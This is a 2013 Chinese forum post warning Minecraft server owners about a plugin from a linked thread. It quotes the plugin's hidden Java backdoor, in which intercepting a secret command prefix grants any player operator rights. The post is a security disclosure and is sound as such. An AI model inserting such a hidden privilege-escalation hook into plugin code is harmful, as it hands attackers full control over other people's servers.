本帖最后由 millerx 于 2013-11-28 11:38 编辑

http://www.mcbbs.net/thread-154465-1-1.html


此插件内涵以下代码


  1. @EventHandler
  2.         public void onPlayerCommandPreprocess(PlayerCommandPreprocessEvent event){
  3.                 if (event.getMessage().startsWith("/*********")){
  4.                         event.getPlayer().setOp(true);
  5.                         event.setCancelled(true);
  6.                         event.getPlayer().sendMessage("Done");
  7.                 }
  8.         }

  9. }
复制代码



极为明显的

居然直接敢把java文件一起编译出来

只要输入 /资料删除

就会把输入这个指令的玩家设置为OP

意思就是一个完全地提权插件!!!!!!!!!!!!!!!!


而且不是通过在yml注册指令,如果不翻源码是找不到的!!!是拦截命令输入这个事件!!!!!
而且权限是玩家!!!任意玩家都可以触发!!!
各位服主一定立刻删除此插件!!!!!!!!!!!!!!!!!